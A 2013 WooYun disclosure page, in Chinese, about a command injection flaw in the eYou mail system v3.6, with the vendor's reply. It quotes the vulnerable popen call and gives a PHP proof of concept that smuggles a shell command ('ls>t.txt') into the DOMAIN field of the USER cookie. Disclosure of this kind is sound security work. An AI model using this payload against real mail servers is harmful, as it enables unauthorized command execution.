当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027523

漏洞标题:eYou邮箱系统v3.6命令执行漏洞

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: YwiSax

提交时间:2013-07-03 08:37

修复时间:2013-10-01 08:38

公开时间:2013-10-01 08:38

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-03: 细节已通知厂商并且等待厂商处理中
2013-07-03: 厂商已经确认,细节仅向厂商公开
2013-07-06: 细节向第三方安全合作伙伴开放
2013-08-27: 细节向核心白帽子及相关领域专家公开
2013-09-06: 细节向普通白帽子公开
2013-09-16: 细节向实习白帽子公开
2013-10-01: 细节向公众公开

简要描述:

我早些时间已经把这个提交给eYou官方了,今天看了下,eYou没有要修复的意思啊。。。看来eYou是打算直接放弃旧版用户了?
==================================
有条件限制,需要登陆权限,新版本无效,还是命令执行。问题出在getUserDir这个函数里,$_COOKIE毫无过滤带入。

详细说明:

先看eYou的代码:

//获取用户目录
function getUserDir($uid, $domain) {
    $handle = popen("/var/eyou/sbin/hashid $uid $domain", 'r');
    $read = fread($handle, 2096);
    pclose($handle);
    return $read;
}


$domain无过滤,直接可以执行。
接着是利用代码,没有现成的哈,自己看着来改就行了。

public function action_test()
{
	$cmd = "ls>t.txt";
	$request = Request::factory('http://mail.XXXXXXXXXXXX.cn/user/autoComplete.php?s=1')
	->cookie('USER', "LASTONE=fake&ENTER_TYPE=0&NO_EYCM=1&GWJUMP=1&MAXRCPTNUM=150&LANG=zh_CN&TOKEN=z2GYCv1SJ&DOMAIN=test.com;{$cmd}&UID=test&LOGIN_DOMAIN=test.com&LOGIN_UID=timothy&ATTSIZE=10&CALLBACK=0&TRACEMAIL=0&GROUPADDR=0&VIEWLIST=0&GLOBALPERMISSION=0&NOTATION=0&BYTESPERCENT=0&BOOKMARK=1&MOBILEMESSAGE=0&DIALUP=0&VIDEOMAIL=0&SECUREMAIL=0&VOICEMAIL=1&CALENDAR=1&STORAGE=1&TOTALSPACE=200&LOCKSTATUS=0&USERNAME=&EXPTIME=0&LETTERS=5000&QUOTA=100&COMPANYADDR=&SKIN=current&")
	->cookie('PHPSESSID', 'e1c8798afec734384cd908180e52b1cf')
	->execute();
	echo Debug::vars($request);
	exit;
}

漏洞证明:

= = 不上图了啊,不敢再拿学校来当目标了,容易被误会。

修复方案:

在getUserDir方法中用正则验证下domain。

版权声明:转载请注明来源 YwiSax@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-07-03 15:56

厂商回复:

非常感谢提供,该版本是公司10年以前的老版本,公司会尽快处理并建议用户升级。

最新状态:

暂无